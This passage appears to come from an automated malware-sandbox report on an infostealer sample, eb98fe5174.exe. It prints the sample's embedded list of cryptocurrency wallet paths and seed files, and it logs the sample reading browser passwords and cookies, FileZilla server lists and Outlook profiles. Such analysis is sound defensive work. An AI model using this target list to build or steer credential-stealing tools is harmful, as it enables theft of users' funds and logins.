Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 53c7d901f1.exe PID: 7996, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0C40 sqlite3_bind_zeroblob, 7_2_6CAC0C40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0D60 sqlite3_bind_parameter_name, 7_2_6CAC0D60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E8EA0 sqlite3_clear_bindings, 7_2_6C9E8EA0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 7_2_6CAC0B40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E6410 bind,WSAGetLastError, 7_2_6C9E6410
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E60B0 listen,WSAGetLastError, 7_2_6C9E60B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9EC030 sqlite3_bind_parameter_count, 7_2_6C9EC030
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9EC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 7_2_6C9EC050
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E6070 PR_Listen, 7_2_6C9E6070
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9722D0 sqlite3_bind_blob, 7_2_6C9722D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E63C0 PR_Bind, 7_2_6C9E63C0